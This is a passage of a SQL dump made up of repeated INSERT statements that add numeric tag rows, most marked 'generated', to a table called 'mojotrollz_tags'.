(`id`, `table`, `type`, `value`, `comment`) VALUES (142712, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142713, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142714, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142715, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142715, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142837, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142838, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142851, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142871, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142872, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142873, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142874, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142911, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142912, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142914, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142915, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142916, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142958, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142961, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142964, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142965, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142966, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142967, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142968, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142970, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142971, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142972, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142973, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142974, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142976, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142977, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142978, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142979, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142980, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143230, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143242, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143243, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143244, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143245, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143246, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143247, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143249, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143250, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143251, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143253, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143254, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143255, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143256, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143273, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143295, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143296, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143297, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143298, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143299, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143301, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143314, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143317, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143318, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143319, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143320, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143321, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143322, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143323, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143324, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143325, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143326, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143328, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143333, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143334, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143336, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143337, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143338, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143342, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143343, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143344, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143345, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143346, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143347, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143348, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143349, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143362, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143363, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143397, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143398, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143399, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143979, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143980, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143981, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143982, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143983, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143984, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143985, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143986, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143987, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143988, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143989, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143990, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (143991, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144011, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144050, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144053, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144054, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144055, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144063, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144065, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144065, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144067, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144068, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144070, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144071, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144072, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144073, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144111, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144111, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144112, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144125, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144126, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144127, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144128, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144129, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144131, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144132, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144133, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144159, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144162, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144179, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144179, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144180, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (144181, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146080, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146081, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146084, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146084, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146085, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146085, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146086, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146086, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146088, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146088, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146089, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146089, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146090, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146090, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146091, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146091, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146096, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (146441, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147039, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147040, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147041, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147042, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147044, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147047, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147065, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147279, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147282, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147283, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147284, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147285, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147435, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147436, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147437, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147438, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147439, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147440, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147441, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147442, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147443, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147444, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147445, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147446, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147447, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147448, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147449, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147450, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147516, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147517, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147536, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147557, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147742, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147743, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147744, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147745, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147746, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147747, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147748, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147749, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147750, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147752, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147753, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147754, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147755, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147756, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147757, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147758, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147759, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147760, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147761, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147762, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147763, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147764, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147765, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147766, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147767, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147768, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147769, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147770, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147771, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147786, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147787, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147792, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147793, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (147824, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148418, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148418, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148419, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148419, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148420, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148420, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148421, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148421, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148423, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148424, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148425, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148426, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148436, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (148437, 